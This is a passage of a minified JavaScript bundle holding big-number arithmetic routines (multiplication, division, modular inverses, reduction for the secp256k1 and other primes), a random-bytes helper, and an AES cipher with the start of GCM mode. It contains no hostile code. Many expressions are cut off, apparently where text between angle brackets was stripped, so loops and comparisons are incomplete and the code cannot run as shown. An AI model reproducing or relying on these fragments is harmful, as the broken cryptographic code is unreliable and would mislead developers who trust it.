Do=(R+(J=J+Math.imul(He,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(He,Va)|0)+Math.imul(Be,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Be,Va)|0)+(Z>>>13)|0)+(Do>>>26)|0,Do&=67108863,J=Math.imul(pt,jt),Z=(Z=Math.imul(pt,qt))+Math.imul(vt,jt)|0,ue=Math.imul(vt,qt),J=J+Math.imul($e,Kt)|0,Z=(Z=Z+Math.imul($e,Zt)|0)+Math.imul(st,Kt)|0,ue=ue+Math.imul(st,Zt)|0,J=J+Math.imul(Oe,ti)|0,Z=(Z=Z+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,ue=ue+Math.imul(Te,ii)|0,J=J+Math.imul(xe,Pt)|0,Z=(Z=Z+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,ue=ue+Math.imul(We,Xt)|0,J=J+Math.imul(mt,Qt)|0,Z=(Z=Z+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,ue=ue+Math.imul(lt,ei)|0,J=J+Math.imul(Ge,ai)|0,Z=(Z=Z+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,ue=ue+Math.imul(Qe,$t)|0,J=J+Math.imul(me,Ut)|0,Z=(Z=Z+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0,ue=ue+Math.imul(Ke,Yt)|0;var Mo=(R+(J=J+Math.imul(De,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(De,Va)|0)+Math.imul(Ve,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ve,Va)|0)+(Z>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,J=Math.imul(pt,Kt),Z=(Z=Math.imul(pt,Zt))+Math.imul(vt,Kt)|0,ue=Math.imul(vt,Zt),J=J+Math.imul($e,ti)|0,Z=(Z=Z+Math.imul($e,ii)|0)+Math.imul(st,ti)|0,ue=ue+Math.imul(st,ii)|0,J=J+Math.imul(Oe,Pt)|0,Z=(Z=Z+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,ue=ue+Math.imul(Te,Xt)|0,J=J+Math.imul(xe,Qt)|0,Z=(Z=Z+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,ue=ue+Math.imul(We,ei)|0,J=J+Math.imul(mt,ai)|0,Z=(Z=Z+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,ue=ue+Math.imul(lt,$t)|0,J=J+Math.imul(Ge,Ut)|0,Z=(Z=Z+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0,ue=ue+Math.imul(Qe,Yt)|0;var no=(R+(J=J+Math.imul(me,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(me,Va)|0)+Math.imul(Ke,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ke,Va)|0)+(Z>>>13)|0)+(no>>>26)|0,no&=67108863,J=Math.imul(pt,ti),Z=(Z=Math.imul(pt,ii))+Math.imul(vt,ti)|0,ue=Math.imul(vt,ii),J=J+Math.imul($e,Pt)|0,Z=(Z=Z+Math.imul($e,Xt)|0)+Math.imul(st,Pt)|0,ue=ue+Math.imul(st,Xt)|0,J=J+Math.imul(Oe,Qt)|0,Z=(Z=Z+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,ue=ue+Math.imul(Te,ei)|0,J=J+Math.imul(xe,ai)|0,Z=(Z=Z+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,ue=ue+Math.imul(We,$t)|0,J=J+Math.imul(mt,Ut)|0,Z=(Z=Z+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0,ue=ue+Math.imul(lt,Yt)|0;var Kn=(R+(J=J+Math.imul(Ge,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ge,Va)|0)+Math.imul(Qe,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Qe,Va)|0)+(Z>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,J=Math.imul(pt,Pt),Z=(Z=Math.imul(pt,Xt))+Math.imul(vt,Pt)|0,ue=Math.imul(vt,Xt),J=J+Math.imul($e,Qt)|0,Z=(Z=Z+Math.imul($e,ei)|0)+Math.imul(st,Qt)|0,ue=ue+Math.imul(st,ei)|0,J=J+Math.imul(Oe,ai)|0,Z=(Z=Z+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,ue=ue+Math.imul(Te,$t)|0,J=J+Math.imul(xe,Ut)|0,Z=(Z=Z+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0,ue=ue+Math.imul(We,Yt)|0;var Sa=(R+(J=J+Math.imul(mt,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(mt,Va)|0)+Math.imul(lt,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(lt,Va)|0)+(Z>>>13)|0)+(Sa>>>26)|0,Sa&=67108863,J=Math.imul(pt,Qt),Z=(Z=Math.imul(pt,ei))+Math.imul(vt,Qt)|0,ue=Math.imul(vt,ei),J=J+Math.imul($e,ai)|0,Z=(Z=Z+Math.imul($e,$t)|0)+Math.imul(st,ai)|0,ue=ue+Math.imul(st,$t)|0,J=J+Math.imul(Oe,Ut)|0,Z=(Z=Z+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0,ue=ue+Math.imul(Te,Yt)|0;var ra=(R+(J=J+Math.imul(xe,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(xe,Va)|0)+Math.imul(We,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(We,Va)|0)+(Z>>>13)|0)+(ra>>>26)|0,ra&=67108863,J=Math.imul(pt,ai),Z=(Z=Math.imul(pt,$t))+Math.imul(vt,ai)|0,ue=Math.imul(vt,$t),J=J+Math.imul($e,Ut)|0,Z=(Z=Z+Math.imul($e,Yt)|0)+Math.imul(st,Ut)|0,ue=ue+Math.imul(st,Yt)|0;var Bd=(R+(J=J+Math.imul(Oe,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Oe,Va)|0)+Math.imul(Te,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Te,Va)|0)+(Z>>>13)|0)+(Bd>>>26)|0,Bd&=67108863,J=Math.imul(pt,Ut),Z=(Z=Math.imul(pt,Yt))+Math.imul(vt,Ut)|0,ue=Math.imul(vt,Yt);var cl=(R+(J=J+Math.imul($e,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul($e,Va)|0)+Math.imul(st,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(st,Va)|0)+(Z>>>13)|0)+(cl>>>26)|0,cl&=67108863;var Bn=(R+(J=Math.imul(pt,Ha))|0)+((8191&(Z=(Z=Math.imul(pt,Va))+Math.imul(vt,Ha)|0))<<13)|0;return R=((ue=Math.imul(vt,Va))+(Z>>>13)|0)+(Bn>>>26)|0,Bn&=67108863,h[0]=co,h[1]=io,h[2]=yo,h[3]=Vn,h[4]=Eo,h[5]=Pn,h[6]=lo,h[7]=ao,h[8]=bo,h[9]=$n,h[10]=Do,h[11]=Mo,h[12]=no,h[13]=Kn,h[14]=Sa,h[15]=ra,h[16]=Bd,h[17]=cl,h[18]=Bn,0!==R&&(h[19]=R,G.length++),G};function O(v,M,P){P.negative=M.negative^v.negative,P.length=v.length+M.length;for(var G=0,X=0,L=0;L>>26)|0)>>>26,h&=67108863}P.words[L]=R,G=h,h=X}return 0!==G?P.words[L]=G:P.length--,P._strip()}function B(v,M,P){return O(v,M,P)}function K(v,M){this.x=v,this.y=M}Math.imul||(S=x),I.prototype.mulTo=function(M,P){var X=this.length+M.length;return 10===this.length&&10===M.length?S(this,M,P):X<63?x(this,M,P):X<1024?O(this,M,P):B(this,M,P)},K.prototype.makeRBT=function(M){for(var P=new Array(M),G=I.prototype._countBits(M)-1,X=0;X>=1;return X},K.prototype.permute=function(M,P,G,X,L,h){for(var R=0;R>>=1)L++;return 1<>>=13),L>>>=13;for(h=2*P;h>=26,G+=L/67108864|0,G+=h>>>26,this.words[X]=67108863&h}return 0!==G&&(this.words[X]=G,this.length++),P?this.ineg():this},I.prototype.muln=function(M){return this.clone().imuln(M)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(M){var P=function w(v){for(var M=new Array(v.bitLength()),P=0;P>>P%26&1;return M}(M);if(0===P.length)return new I(1);for(var G=this,X=0;X=0);var L,P=M%26,G=(M-P)/26,X=67108863>>>26-P<<26-P;if(0!==P){var h=0;for(L=0;L>>26-P}h&&(this.words[L]=h,this.length++)}if(0!==G){for(L=this.length-1;L>=0;L--)this.words[L+G]=this.words[L];for(L=0;L=0),X=P?(P-P%26)/26:0;var L=M%26,h=Math.min((M-L)/26,this.length),R=67108863^67108863>>>L<h)for(this.length-=h,Z=0;Z=0&&(0!==ue||Z>=X);Z--){var Ie=0|this.words[Z];this.words[Z]=ue<<26-L|Ie>>>L,ue=Ie&R}return J&&0!==ue&&(J.words[J.length++]=ue),0===this.length&&(this.words[0]=0,this.length=1),this._strip()},I.prototype.ishrn=function(M,P,G){return Q(0===this.negative),this.iushrn(M,P,G)},I.prototype.shln=function(M){return this.clone().ishln(M)},I.prototype.ushln=function(M){return this.clone().iushln(M)},I.prototype.shrn=function(M){return this.clone().ishrn(M)},I.prototype.ushrn=function(M){return this.clone().iushrn(M)},I.prototype.testn=function(M){Q("number"==typeof M&&M>=0);var P=M%26,G=(M-P)/26;return!(this.length<=G||!(this.words[G]&1<=0);var P=M%26,G=(M-P)/26;return Q(0===this.negative,"imaskn works only with positive numbers"),this.length<=G?this:(0!==P&&G++,this.length=Math.min(G,this.length),0!==P&&(this.words[this.length-1]&=67108863^67108863>>>P<=67108864;P++)this.words[P]-=67108864,P===this.length-1?this.words[P+1]=1:this.words[P+1]++;return this.length=Math.max(this.length,P+1),this},I.prototype.isubn=function(M){if(Q("number"==typeof M),Q(M<67108864),M<0)return this.iaddn(-M);if(0!==this.negative)return this.negative=0,this.iaddn(M),this.negative=1,this;if(this.words[0]-=M,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var P=0;P>26)-(J/67108864|0),this.words[L+G]=67108863&h}for(;L>26,this.words[L+G]=67108863&h;if(0===R)return this._strip();for(Q(-1===R),R=0,L=0;L>26,this.words[L]=67108863&h;return this.negative=1,this._strip()},I.prototype._wordDiv=function(M,P){var G,X=this.clone(),L=M,h=0|L.words[L.length-1];0!=(G=26-this._countBits(h))&&(L=L.ushln(G),X.iushln(G),h=0|L.words[L.length-1]);var Z,J=X.length-L.length;if("mod"!==P){(Z=new I(null)).length=J+1,Z.words=new Array(Z.length);for(var ue=0;ue=0;Ae--){var Ue=67108864*(0|X.words[L.length+Ae])+(0|X.words[L.length+Ae-1]);for(Ue=Math.min(Ue/h|0,67108863),X._ishlnsubmul(L,Ue,Ae);0!==X.negative;)Ue--,X.negative=0,X._ishlnsubmul(L,1,Ae),X.isZero()||(X.negative^=1);Z&&(Z.words[Ae]=Ue)}return Z&&Z._strip(),X._strip(),"div"!==P&&0!==G&&X.iushrn(G),{div:Z||null,mod:X}},I.prototype.divmod=function(M,P,G){return Q(!M.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===M.negative?(h=this.neg().divmod(M,P),"mod"!==P&&(X=h.div.neg()),"div"!==P&&(L=h.mod.neg(),G&&0!==L.negative&&L.iadd(M)),{div:X,mod:L}):0===this.negative&&0!==M.negative?(h=this.divmod(M.neg(),P),"mod"!==P&&(X=h.div.neg()),{div:X,mod:h.mod}):0!=(this.negative&M.negative)?(h=this.neg().divmod(M.neg(),P),"div"!==P&&(L=h.mod.neg(),G&&0!==L.negative&&L.isub(M)),{div:h.div,mod:L}):M.length>this.length||this.cmp(M)<0?{div:new I(0),mod:this}:1===M.length?"div"===P?{div:this.divn(M.words[0]),mod:null}:"mod"===P?{div:null,mod:new I(this.modrn(M.words[0]))}:{div:this.divn(M.words[0]),mod:new I(this.modrn(M.words[0]))}:this._wordDiv(M,P);var X,L,h},I.prototype.div=function(M){return this.divmod(M,"div",!1).div},I.prototype.mod=function(M){return this.divmod(M,"mod",!1).mod},I.prototype.umod=function(M){return this.divmod(M,"mod",!0).mod},I.prototype.divRound=function(M){var P=this.divmod(M);if(P.mod.isZero())return P.div;var G=0!==P.div.negative?P.mod.isub(M):P.mod,X=M.ushrn(1),L=M.andln(1),h=G.cmp(X);return h<0||1===L&&0===h?P.div:0!==P.div.negative?P.div.isubn(1):P.div.iaddn(1)},I.prototype.modrn=function(M){var P=M<0;P&&(M=-M),Q(M<=67108863);for(var G=(1<<26)%M,X=0,L=this.length-1;L>=0;L--)X=(G*X+(0|this.words[L]))%M;return P?-X:X},I.prototype.modn=function(M){return this.modrn(M)},I.prototype.idivn=function(M){var P=M<0;P&&(M=-M),Q(M<=67108863);for(var G=0,X=this.length-1;X>=0;X--){var L=(0|this.words[X])+67108864*G;this.words[X]=L/M|0,G=L%M}return this._strip(),P?this.ineg():this},I.prototype.divn=function(M){return this.clone().idivn(M)},I.prototype.egcd=function(M){Q(0===M.negative),Q(!M.isZero());var P=this,G=M.clone();P=0!==P.negative?P.umod(M):P.clone();for(var X=new I(1),L=new I(0),h=new I(0),R=new I(1),J=0;P.isEven()&&G.isEven();)P.iushrn(1),G.iushrn(1),++J;for(var Z=G.clone(),ue=P.clone();!P.isZero();){for(var Ie=0,Ae=1;0==(P.words[0]&Ae)&&Ie<26;++Ie,Ae<<=1);if(Ie>0)for(P.iushrn(Ie);Ie-- >0;)(X.isOdd()||L.isOdd())&&(X.iadd(Z),L.isub(ue)),X.iushrn(1),L.iushrn(1);for(var Ue=0,Xe=1;0==(G.words[0]&Xe)&&Ue<26;++Ue,Xe<<=1);if(Ue>0)for(G.iushrn(Ue);Ue-- >0;)(h.isOdd()||R.isOdd())&&(h.iadd(Z),R.isub(ue)),h.iushrn(1),R.iushrn(1);P.cmp(G)>=0?(P.isub(G),X.isub(h),L.isub(R)):(G.isub(P),h.isub(X),R.isub(L))}return{a:h,b:R,gcd:G.iushln(J)}},I.prototype._invmp=function(M){Q(0===M.negative),Q(!M.isZero());var Ie,P=this,G=M.clone();P=0!==P.negative?P.umod(M):P.clone();for(var X=new I(1),L=new I(0),h=G.clone();P.cmpn(1)>0&&G.cmpn(1)>0;){for(var R=0,J=1;0==(P.words[0]&J)&&R<26;++R,J<<=1);if(R>0)for(P.iushrn(R);R-- >0;)X.isOdd()&&X.iadd(h),X.iushrn(1);for(var Z=0,ue=1;0==(G.words[0]&ue)&&Z<26;++Z,ue<<=1);if(Z>0)for(G.iushrn(Z);Z-- >0;)L.isOdd()&&L.iadd(h),L.iushrn(1);P.cmp(G)>=0?(P.isub(G),X.isub(L)):(G.isub(P),L.isub(X))}return(Ie=0===P.cmpn(1)?X:L).cmpn(0)<0&&Ie.iadd(M),Ie},I.prototype.gcd=function(M){if(this.isZero())return M.abs();if(M.isZero())return this.abs();var P=this.clone(),G=M.clone();P.negative=0,G.negative=0;for(var X=0;P.isEven()&&G.isEven();X++)P.iushrn(1),G.iushrn(1);for(;;){for(;P.isEven();)P.iushrn(1);for(;G.isEven();)G.iushrn(1);var L=P.cmp(G);if(L<0){var h=P;P=G,G=h}else if(0===L||0===G.cmpn(1))break;P.isub(G)}return G.iushln(X)},I.prototype.invm=function(M){return this.egcd(M).a.umod(M)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(M){return this.words[0]&M},I.prototype.bincn=function(M){Q("number"==typeof M);var P=M%26,G=(M-P)/26,X=1<>>26,this.words[h]=R&=67108863}return 0!==L&&(this.words[h]=L,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(M){var G,P=M<0;if(0!==this.negative&&!P)return-1;if(0===this.negative&&P)return 1;if(this._strip(),this.length>1)G=1;else{P&&(M=-M),Q(M<=67108863,"Number is too big");var X=0|this.words[0];G=X===M?0:XM.length)return 1;if(this.length=0;G--){var X=0|this.words[G],L=0|M.words[G];if(X!==L){XL&&(P=1);break}}return P},I.prototype.gtn=function(M){return 1===this.cmpn(M)},I.prototype.gt=function(M){return 1===this.cmp(M)},I.prototype.gten=function(M){return this.cmpn(M)>=0},I.prototype.gte=function(M){return this.cmp(M)>=0},I.prototype.ltn=function(M){return-1===this.cmpn(M)},I.prototype.lt=function(M){return-1===this.cmp(M)},I.prototype.lten=function(M){return this.cmpn(M)<=0},I.prototype.lte=function(M){return this.cmp(M)<=0},I.prototype.eqn=function(M){return 0===this.cmpn(M)},I.prototype.eq=function(M){return 0===this.cmp(M)},I.red=function(M){return new l(M)},I.prototype.toRed=function(M){return Q(!this.red,"Already a number in reduction context"),Q(0===this.negative,"red works only with positives"),M.convertTo(this)._forceRed(M)},I.prototype.fromRed=function(){return Q(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(M){return this.red=M,this},I.prototype.forceRed=function(M){return Q(!this.red,"Already a number in reduction context"),this._forceRed(M)},I.prototype.redAdd=function(M){return Q(this.red,"redAdd works only with red numbers"),this.red.add(this,M)},I.prototype.redIAdd=function(M){return Q(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,M)},I.prototype.redSub=function(M){return Q(this.red,"redSub works only with red numbers"),this.red.sub(this,M)},I.prototype.redISub=function(M){return Q(this.red,"redISub works only with red numbers"),this.red.isub(this,M)},I.prototype.redShl=function(M){return Q(this.red,"redShl works only with red numbers"),this.red.shl(this,M)},I.prototype.redMul=function(M){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,M),this.red.mul(this,M)},I.prototype.redIMul=function(M){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,M),this.red.imul(this,M)},I.prototype.redSqr=function(){return Q(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return Q(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return Q(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return Q(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return Q(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(M){return Q(this.red&&!M.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,M)};var ee={k256:null,p224:null,p192:null,p25519:null};function se(v,M){this.name=v,this.p=new I(M,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function ve(){se.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function le(){se.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function ye(){se.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function z(){se.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function l(v){if("string"==typeof v){var M=I._prime(v);this.m=M.p,this.prime=M}else Q(v.gtn(1),"modulus must be greater than 1"),this.m=v,this.prime=null}function f(v){l.call(this,v),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}se.prototype._tmp=function(){var M=new I(null);return M.words=new Array(Math.ceil(this.n/13)),M},se.prototype.ireduce=function(M){var G,P=M;do{this.split(P,this.tmp),G=(P=(P=this.imulK(P)).iadd(this.tmp)).bitLength()}while(G>this.n);var X=G0?P.isub(this.p):void 0!==P.strip?P.strip():P._strip(),P},se.prototype.split=function(M,P){M.iushrn(this.n,0,P)},se.prototype.imulK=function(M){return M.imul(this.k)},ae(ve,se),ve.prototype.split=function(M,P){for(var G=4194303,X=Math.min(M.length,9),L=0;L>>22,h=R}M.words[L-10]=h>>>=22,M.length-=0===h&&M.length>10?10:9},ve.prototype.imulK=function(M){M.words[M.length]=0,M.words[M.length+1]=0,M.length+=2;for(var P=0,G=0;G>>=26,M.words[G]=L,P=X}return 0!==P&&(M.words[M.length++]=P),M},I._prime=function(M){if(ee[M])return ee[M];var P;if("k256"===M)P=new ve;else if("p224"===M)P=new le;else if("p192"===M)P=new ye;else{if("p25519"!==M)throw new Error("Unknown prime "+M);P=new z}return ee[M]=P,P},l.prototype._verify1=function(M){Q(0===M.negative,"red works only with positives"),Q(M.red,"red works only with red numbers")},l.prototype._verify2=function(M,P){Q(0==(M.negative|P.negative),"red works only with positives"),Q(M.red&&M.red===P.red,"red works only with red numbers")},l.prototype.imod=function(M){return this.prime?this.prime.ireduce(M)._forceRed(this):(b(M,M.umod(this.m)._forceRed(this)),M)},l.prototype.neg=function(M){return M.isZero()?M.clone():this.m.sub(M)._forceRed(this)},l.prototype.add=function(M,P){this._verify2(M,P);var G=M.add(P);return G.cmp(this.m)>=0&&G.isub(this.m),G._forceRed(this)},l.prototype.iadd=function(M,P){this._verify2(M,P);var G=M.iadd(P);return G.cmp(this.m)>=0&&G.isub(this.m),G},l.prototype.sub=function(M,P){this._verify2(M,P);var G=M.sub(P);return G.cmpn(0)<0&&G.iadd(this.m),G._forceRed(this)},l.prototype.isub=function(M,P){this._verify2(M,P);var G=M.isub(P);return G.cmpn(0)<0&&G.iadd(this.m),G},l.prototype.shl=function(M,P){return this._verify1(M),this.imod(M.ushln(P))},l.prototype.imul=function(M,P){return this._verify2(M,P),this.imod(M.imul(P))},l.prototype.mul=function(M,P){return this._verify2(M,P),this.imod(M.mul(P))},l.prototype.isqr=function(M){return this.imul(M,M.clone())},l.prototype.sqr=function(M){return this.mul(M,M)},l.prototype.sqrt=function(M){if(M.isZero())return M.clone();var P=this.m.andln(3);if(Q(P%2==1),3===P){var G=this.m.add(new I(1)).iushrn(2);return this.pow(M,G)}for(var X=this.m.subn(1),L=0;!X.isZero()&&0===X.andln(1);)L++,X.iushrn(1);Q(!X.isZero());var h=new I(1).toRed(this),R=h.redNeg(),J=this.m.subn(1).iushrn(1),Z=this.m.bitLength();for(Z=new I(2*Z*Z).toRed(this);0!==this.pow(Z,J).cmp(R);)Z.redIAdd(R);for(var ue=this.pow(Z,X),Ie=this.pow(M,X.addn(1).iushrn(1)),Ae=this.pow(M,X),Ue=L;0!==Ae.cmp(h);){for(var Xe=Ae,He=0;0!==Xe.cmp(h);He++)Xe=Xe.redSqr();Q(He=0;L--){for(var ue=P.words[L],Ie=Z-1;Ie>=0;Ie--){var Ae=ue>>Ie&1;h!==X[0]&&(h=this.sqr(h)),0!==Ae||0!==R?(R<<=1,R|=Ae,(4==++J||0===L&&0===Ie)&&(h=this.mul(h,X[R]),J=0,R=0)):J=0}Z=26}return h},l.prototype.convertTo=function(M){var P=M.umod(this.m);return P===M?P.clone():P},l.prototype.convertFrom=function(M){var P=M.clone();return P.red=null,P},I.mont=function(M){return new f(M)},ae(f,l),f.prototype.convertTo=function(M){return this.imod(M.ushln(this.shift))},f.prototype.convertFrom=function(M){var P=this.imod(M.mul(this.rinv));return P.red=null,P},f.prototype.imul=function(M,P){if(M.isZero()||P.isZero())return M.words[0]=0,M.length=1,M;var G=M.imul(P),X=G.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),L=G.isub(X).iushrn(this.shift),h=L;return L.cmp(this.m)>=0?h=L.isub(this.m):L.cmpn(0)<0&&(h=L.iadd(this.m)),h._forceRed(this)},f.prototype.mul=function(M,P){if(M.isZero()||P.isZero())return new I(0)._forceRed(this);var G=M.mul(P),X=G.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),L=G.isub(X).iushrn(this.shift),h=L;return L.cmp(this.m)>=0?h=L.isub(this.m):L.cmpn(0)<0&&(h=L.iadd(this.m)),h._forceRed(this)},f.prototype.invm=function(M){return this.imod(M._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},9598:(Pe,we,de)=>{var ie;function j(ae){this.rand=ae}if(Pe.exports=function(I){return ie||(ie=new j(null)),ie.generate(I)},Pe.exports.Rand=j,j.prototype.generate=function(I){return this._rand(I)},j.prototype._rand=function(I){if(this.rand.getBytes)return this.rand.getBytes(I);for(var $=new Uint8Array(I),U=0;U<$.length;U++)$[U]=this.rand.getByte();return $},"object"==typeof self)self.crypto&&self.crypto.getRandomValues?j.prototype._rand=function(I){var $=new Uint8Array(I);return self.crypto.getRandomValues($),$}:self.msCrypto&&self.msCrypto.getRandomValues?j.prototype._rand=function(I){var $=new Uint8Array(I);return self.msCrypto.getRandomValues($),$}:"object"==typeof window&&(j.prototype._rand=function(){throw new Error("Not implemented yet")});else try{var Q=de(9214);if("function"!=typeof Q.randomBytes)throw new Error("Not supported");j.prototype._rand=function(I){return Q.randomBytes(I)}}catch(ae){}},5461:(Pe,we,de)=>{var ie=de(265).Buffer;function j(E){ie.isBuffer(E)||(E=ie.from(E));for(var C=E.length/4|0,b=new Array(C),_=0;_>>24]^p[S>>>16&255]^D[O>>>8&255]^w[255&B]^C[le++],ee=A[S>>>24]^p[O>>>16&255]^D[B>>>8&255]^w[255&x]^C[le++],se=A[O>>>24]^p[B>>>16&255]^D[x>>>8&255]^w[255&S]^C[le++],ve=A[B>>>24]^p[x>>>16&255]^D[S>>>8&255]^w[255&O]^C[le++],x=K,S=ee,O=se,B=ve;return K=(_[x>>>24]<<24|_[S>>>16&255]<<16|_[O>>>8&255]<<8|_[255&B])^C[le++],ee=(_[S>>>24]<<24|_[O>>>16&255]<<16|_[B>>>8&255]<<8|_[255&x])^C[le++],se=(_[O>>>24]<<24|_[B>>>16&255]<<16|_[x>>>8&255]<<8|_[255&S])^C[le++],ve=(_[B>>>24]<<24|_[x>>>16&255]<<16|_[S>>>8&255]<<8|_[255&O])^C[le++],[K>>>=0,ee>>>=0,se>>>=0,ve>>>=0]}var I=[0,1,2,4,8,16,32,64,128,27,54],$=function(){for(var E=new Array(256),C=0;C<256;C++)E[C]=C<128?C<<1:C<<1^283;for(var b=[],_=[],y=[[],[],[],[]],A=[[],[],[],[]],p=0,D=0,w=0;w<256;++w){var x=D^D<<1^D<<2^D<<3^D<<4;b[p]=x=x>>>8^255&x^99,_[x]=p;var S=E[p],O=E[S],B=E[O],K=257*E[x]^16843008*x;y[0][p]=K<<24|K>>>8,y[1][p]=K<<16|K>>>16,y[2][p]=K<<8|K>>>24,y[3][p]=K,A[0][x]=(K=16843009*B^65537*O^257*S^16843008*p)<<24|K>>>8,A[1][x]=K<<16|K>>>16,A[2][x]=K<<8|K>>>24,A[3][x]=K,0===p?p=D=1:(p=S^E[E[E[B^S]]],D^=E[E[D]])}return{SBOX:b,INV_SBOX:_,SUB_MIX:y,INV_SUB_MIX:A}}();function U(E){this._key=j(E),this._reset()}U.blockSize=16,U.keySize=32,U.prototype.blockSize=U.blockSize,U.prototype.keySize=U.keySize,U.prototype._reset=function(){for(var E=this._key,C=E.length,b=C+6,_=4*(b+1),y=[],A=0;A>>24)>>>24]<<24|$.SBOX[p>>>16&255]<<16|$.SBOX[p>>>8&255]<<8|$.SBOX[255&p],p^=I[A/C|0]<<24):C>6&&A%C==4&&(p=$.SBOX[p>>>24]<<24|$.SBOX[p>>>16&255]<<16|$.SBOX[p>>>8&255]<<8|$.SBOX[255&p]),y[A]=y[A-C]^p}for(var D=[],w=0;w<_;w++){var x=_-w,S=y[x-(w%4?0:4)];D[w]=w<4||x<=4?S:$.INV_SUB_MIX[0][$.SBOX[S>>>24]]^$.INV_SUB_MIX[1][$.SBOX[S>>>16&255]]^$.INV_SUB_MIX[2][$.SBOX[S>>>8&255]]^$.INV_SUB_MIX[3][$.SBOX[255&S]]}this._nRounds=b,this._keySchedule=y,this._invKeySchedule=D},U.prototype.encryptBlockRaw=function(E){return ae(E=j(E),this._keySchedule,$.SUB_MIX,$.SBOX,this._nRounds)},U.prototype.encryptBlock=function(E){var C=this.encryptBlockRaw(E),b=ie.allocUnsafe(16);return b.writeUInt32BE(C[0],0),b.writeUInt32BE(C[1],4),b.writeUInt32BE(C[2],8),b.writeUInt32BE(C[3],12),b},U.prototype.decryptBlock=function(E){var C=(E=j(E))[1];E[1]=E[3],E[3]=C;var b=ae(E,this._invKeySchedule,$.INV_SUB_MIX,$.INV_SBOX,this._nRounds),_=ie.allocUnsafe(16);return _.writeUInt32BE(b[0],0),_.writeUInt32BE(b[3],4),_.writeUInt32BE(b[2],8),_.writeUInt32BE(b[1],12),_},U.prototype.scrub=function(){Q(this._keySchedule),Q(this._invKeySchedule),Q(this._key)},Pe.exports.AES=U},4661:(Pe,we,de)=>{var ie=de(5461),j=de(265).Buffer,Q=de(4003),ae=de(2270),I=de(3486),$=de(7110),U=de(7841);function b(_,y,A,p){Q.call(this);var D=j.alloc(4,0);this._cipher=new ie.AES(y);var w=this._cipher.encryptBlock(D);this._ghash=new I(w),A=function C(_,y,A){if(12===y.length)return _._finID=j.concat([y,j.from([0,0,0,1])]),j.concat([y,j.from([0,0,0,2])]);var p=new I(A),D=y.length,w=D%16;p.update(y),w&&p.update(j.alloc(w=16-w,0)),p.update(j.alloc(8,0));var x=8*D,S=j.alloc(8);S.writeUIntBE(x,0,8),p.update(S),_._finID=p.state;var O=j.from(_._finID);return 